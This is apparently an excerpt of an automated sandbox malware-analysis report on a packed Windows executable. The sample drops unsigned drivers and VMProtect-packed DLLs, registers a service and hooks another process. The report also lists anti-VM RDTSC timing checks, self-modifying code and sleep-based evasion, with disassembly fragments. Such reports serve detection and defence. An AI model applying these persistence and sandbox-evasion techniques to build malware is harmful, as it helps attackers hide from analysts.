      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9A28C push 0BE9A2C9h; ret 2_2_0BE9A2C1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEAA29C push ecx; mov dword ptr [esp], edx2_2_0BEAA2A1
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEB224A push 0BEB2278h; ret 2_2_0BEB2270
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEB2202 push 0BEB2230h; ret 2_2_0BEB2228
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEAA180 push ecx; mov dword ptr [esp], edx2_2_0BEAA185
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEEA16E pushfd ; mov dword ptr [esp], esi2_2_0BEEA14A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEEA16E push edi; mov dword ptr [esp], ebp2_2_0BEEB84A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEEA0D4 pushad ; mov dword ptr [esp], C151F597h2_2_0BF35F47
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BF580AB push dword ptr [esp+18h]; retn 001Ch2_2_0BF580BD
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BFF0001 pushfd ; mov dword ptr [esp], 7D16BF76h2_2_0BFF7208
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 0DE entropy: 7.9997364104024875
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 1TA entropy: 7.978322038476304
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 3data entropy: 7.935257273389065
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 8ext entropy: 7.900782660215838
      Source: D74384FB8D2C9.exe.0.drStatic PE information: section name: 10ta entropy: 7.973925222571074
      Source: 22FD558C8.sys.2.drStatic PE information: section name: .spa1 entropy: 7.856264468855936
      Source: D74384F.sys.2.drStatic PE information: section name: .spa1 entropy: 7.856264468855936
      Source: FC14NMPKD.dll.2.drStatic PE information: section name: .vmp0 entropy: 7.158932382234513
      Source: E816IBB62.dll.2.drStatic PE information: section name: .vmp0 entropy: 7.927136044627817
      Source: F977IID54.dll.2.drStatic PE information: section name: .vmp1 entropy: 7.957735490987599
      Source: F04bWTUR.dll.2.drStatic PE information: section name: .vmp1 entropy: 7.957735490987599
      Source: 8FD7ijlhc.exe.2.drStatic PE information: section name: .vmp0 entropy: 7.857046294810997
      Source: 8FD7ijlhc.exe.2.drStatic PE information: section name: .vmp1 entropy: 7.212207379605288
      Source: 5B38DA6A8.dll.2.drStatic PE information: section name: .vmp1 entropy: 7.9279321384111645
      Source: A2F0jleks.dll.2.drStatic PE information: section name: .vvvt1 entropy: 7.89458918106719
      Source: D5AESTNHE.dll.2.drStatic PE information: section name: .vmp0 entropy: 7.933949478599191
      Source: 5801srmps.dll.2.drStatic PE information: section name: .vmp1 entropy: 7.8581135744322665
      Source: E875FIB50.dll.2.drStatic PE information: section name: .vmp1 entropy: 7.9425689331629465

      Persistence and Installation Behavior

      barindex
      Sample is not signed and drops a device driver
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Windows\SysWOW64\22FD558C8.sysJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Windows\D74384F.sysJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\FACCB296\21AAtnoki.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\C39C3E72B\4509OKKGD.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exeJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dllJump to dropped file
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeFile created: C:\Program Files (x86)\Google\D74384FB8D2C9.exeJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Windows\SysWOW64\22FD558C8.sysJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\AB67019A2010\346DgjhcV.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Windows\D74384F.sysJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B90\C945E611y.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Windows\SysWOW64\22FD558C8.sysJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile created: C:\Windows\D74384F.sysJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\D74384FJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{32cb138b-8507-4cec-ba14-fc0247804fd4}Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E2680 OpenSCManagerA,CloseServiceHandle,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_6A6E2680

      Hooking and other Techniques for Hiding and Protection

      barindex
      Overwrites code with unconditional jumps - possibly settings hooks in foreign process
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: PID: 3788 base: 77030005 value: E9 2B BA E8 FF Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: PID: 3788 base: 76EBBA30 value: E9 6B 7E 0C 8A Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: PID: 3788 base: 77030017 value: E9 7C 8E ED FF Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: PID: 3788 base: 76F08E90 value: E9 9B AA 07 8A Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: PID: 3788 base: 75F80005 value: E9 8B 8A ED FF Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: PID: 3788 base: 75E58A90 value: E9 1B AD 12 8B Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: PID: 3788 base: 75F80014 value: E9 1C 02 F0 FF Jump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeMemory written: PID: 3788 base: 75E80230 value: E9 0B 36 10 8B Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory written: PID: 5448 base: 77030005 value: E9 2B BA E8 FF Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory written: PID: 5448 base: 76EBBA30 value: E9 6B 7E 5F 89 Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory written: PID: 5448 base: 77030017 value: E9 7C 8E ED FF Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory written: PID: 5448 base: 76F08E90 value: E9 9B AA 5A 89 Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory written: PID: 5448 base: 75F80005 value: E9 8B 8A ED FF Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory written: PID: 5448 base: 75E58A90 value: E9 1B AD 65 8A Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory written: PID: 5448 base: 75F80014 value: E9 1C 02 F0 FF Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory written: PID: 5448 base: 75E80230 value: E9 0B 36 63 8A Jump to behavior
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 5566
      Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 49706
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6F5C1F IsIconic,GetWindowPlacement,GetWindowRect,2_2_6A6F5C1F
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Contains functionality to detect sleep reduction / modifications
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D3C402_2_6A6D3C40
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeRDTSC instruction interceptor: First address: 1697D1F second address: 127993D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 mov dword ptr [esp], ebx 0x00000006 push 038D540Eh 0x0000000b jmp 00007F0438974CB3h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeRDTSC instruction interceptor: First address: 127993D second address: 17B6C51 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 xchg dword ptr [esp], esi 0x00000006 cdq 0x00000007 jmp 00007F0438A6770Dh 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeRDTSC instruction interceptor: First address: 1676EFE second address: 1697D1F instructions: 0x00000000 rdtsc 0x00000002 not dh 0x00000004 mov eax, dword ptr [ecx] 0x00000006 setne dl 0x00000009 jmp 00007F043935563Ah 0x0000000e pop edx 0x0000000f mov dh, bl 0x00000011 mov edx, dword ptr [eax+0Ch] 0x00000014 pushfd 0x00000015 pushfd 0x00000016 jmp 00007F04392EE32Bh 0x0000001b mov dword ptr [esp+1Ch], 00F96144h 0x00000023 push 92FE600Dh 0x00000028 mov dword ptr [esp+1Ch], edi 0x0000002c call 00007F043829A6E8h 0x00000031 mov byte ptr [esp+04h], bh 0x00000035 mov byte ptr [esp], al 0x00000038 mov dword ptr [esp+1Ch], 01526A1Fh 0x00000040 mov byte ptr [esp], 00000054h 0x00000044 jmp 00007F0438D8D733h 0x00000049 jmp 00007F0438BE1473h 0x0000004e mov dword ptr [esp+18h], edx 0x00000052 pushfd 0x00000053 pushad 0x00000054 pushfd 0x00000055 push dword ptr [esp] 0x00000058 push dword ptr [esp+44h] 0x0000005c retn 0048h 0x0000005f jmp 00007F04394AA85Dh 0x00000064 lea edx, dword ptr [eax-157C2B86h] 0x0000006a movzx edx, cl 0x0000006d push ebp 0x0000006e btr bp, 0003h 0x00000073 pushfd 0x00000074 stc 0x00000075 lahf 0x00000076 lea ebp, dword ptr [esp+04h] 0x0000007a neg dl 0x0000007c sub esp, 000004CCh 0x00000082 mov dx, F001h 0x00000086 rdtsc
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeRDTSC instruction interceptor: First address: 149C80E second address: 1800304 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 movzx dx, dl 0x00000007 push edi 0x00000008 lea eax, dword ptr [esi+7D9A7D2Bh] 0x0000000e pushad 0x0000000f jmp 00007F043888DEE4h 0x00000014 mov edi, dword ptr [ebp+08h] 0x00000017 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRDTSC instruction interceptor: First address: BC7D1F second address: 7A993D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 mov dword ptr [esp], ebx 0x00000006 push 038D540Eh 0x0000000b jmp 00007F0438974CB3h 0x00000010 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRDTSC instruction interceptor: First address: 7A993D second address: CE6C51 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 xchg dword ptr [esp], esi 0x00000006 cdq 0x00000007 jmp 00007F0438A6770Dh 0x0000000c rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRDTSC instruction interceptor: First address: BA6EFE second address: BC7D1F instructions: 0x00000000 rdtsc 0x00000002 not dh 0x00000004 mov eax, dword ptr [ecx] 0x00000006 setne dl 0x00000009 jmp 00007F043935563Ah 0x0000000e pop edx 0x0000000f mov dh, bl 0x00000011 mov edx, dword ptr [eax+0Ch] 0x00000014 pushfd 0x00000015 pushfd 0x00000016 jmp 00007F04392EE32Bh 0x0000001b mov dword ptr [esp+1Ch], 004C6144h 0x00000023 push 92FE600Dh 0x00000028 mov dword ptr [esp+1Ch], edi 0x0000002c call 00007F043829A6E8h 0x00000031 mov byte ptr [esp+04h], bh 0x00000035 mov byte ptr [esp], al 0x00000038 mov dword ptr [esp+1Ch], 00A56A1Fh 0x00000040 mov byte ptr [esp], 00000054h 0x00000044 jmp 00007F0438D8D733h 0x00000049 jmp 00007F0438BE1473h 0x0000004e mov dword ptr [esp+18h], edx 0x00000052 pushfd 0x00000053 pushad 0x00000054 pushfd 0x00000055 push dword ptr [esp] 0x00000058 push dword ptr [esp+44h] 0x0000005c retn 0048h 0x0000005f jmp 00007F04394AA85Dh 0x00000064 lea edx, dword ptr [eax-157C2B86h] 0x0000006a movzx edx, cl 0x0000006d push ebp 0x0000006e btr bp, 0003h 0x00000073 pushfd 0x00000074 stc 0x00000075 lahf 0x00000076 lea ebp, dword ptr [esp+04h] 0x0000007a neg dl 0x0000007c sub esp, 000004CCh 0x00000082 mov dx, F001h 0x00000086 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRDTSC instruction interceptor: First address: 9CC80E second address: D30304 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 movzx dx, dl 0x00000007 push edi 0x00000008 lea eax, dword ptr [esi+7D9A7D2Bh] 0x0000000e pushad 0x0000000f jmp 00007F043888DEE4h 0x00000014 mov edi, dword ptr [ebp+08h] 0x00000017 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRDTSC instruction interceptor: First address: 420683 second address: 420683 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 ret 0x00000004 xor edx, edx 0x00000006 mov ecx, 0000003Dh 0x0000000b div ecx 0x0000000d mov eax, dword ptr [ebp-000000B4h] 0x00000013 mov cl, byte ptr [ebp+edx-000000B0h] 0x0000001a mov byte ptr [ebp+eax-70h], cl 0x0000001e jmp 00007F0438D93067h 0x00000020 mov edx, dword ptr [ebp-000000B4h] 0x00000026 add edx, 01h 0x00000029 mov dword ptr [ebp-000000B4h], edx 0x0000002f mov eax, dword ptr [ebp-000000B4h] 0x00000035 cmp eax, dword ptr [ebp-04h] 0x00000038 jnl 00007F0438D930C3h 0x0000003a call 00007F0438DA85FFh 0x0000003f push ebp 0x00000040 mov ebp, esp 0x00000042 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRDTSC instruction interceptor: First address: 6A6DAF73 second address: 6A6DAF73 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 mov eax, 4325C53Fh 0x00000009 mul ecx 0x0000000b shr edx, 04h 0x0000000e imul edx, edx, 3Dh 0x00000011 sub ecx, edx 0x00000013 mov cl, byte ptr [esp+ecx+6Ch] 0x00000017 mov byte ptr [esp+esi+08h], cl 0x0000001b inc esi 0x0000001c cmp esi, 05h 0x0000001f jl 00007F043852A3E1h 0x00000021 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeRDTSC instruction interceptor: First address: 6A6E097D second address: 6A6E0981 instructions: 0x00000000 rdtsc 0x00000002 mov esi, eax 0x00000004 rdtsc
      Tries to evade debugger and weak emulator (self modifying code)
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeSpecial instruction interceptor: First address: 36FA1BD instructions caused by: Self-modifying code
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeSpecial instruction interceptor: First address: 2C2A1BD instructions caused by: Self-modifying code
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory allocated: 5FE0000 memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory allocated: C790000 memory commit | memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory allocated: D510000 memory commit | memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory allocated: D530000 memory commit | memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeMemory allocated: 117D0000 memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E0900 rdtsc 2_2_6A6E0900
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeWindow / User API: threadDelayed 3973Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeWindow / User API: threadDelayed 5251Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-88240
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\FACCB296\21AAtnoki.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\C39C3E72B\4509OKKGD.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exeJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Windows\SysWOW64\22FD558C8.sysJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\AB67019A2010\346DgjhcV.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B90\C945E611y.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Windows\D74384F.sysJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-87947
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-86730
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D3C402_2_6A6D3C40
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 1476Thread sleep time: -68000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 4308Thread sleep time: -3973000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 7064Thread sleep time: -99000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 5664Thread sleep time: -54000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 6516Thread sleep time: -40000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 4308Thread sleep time: -5251000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 5960Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 5960Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9BA3C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,2_2_0BE9BA3C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9622C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_0BE9622C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6FB28B __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_6A6FB28B
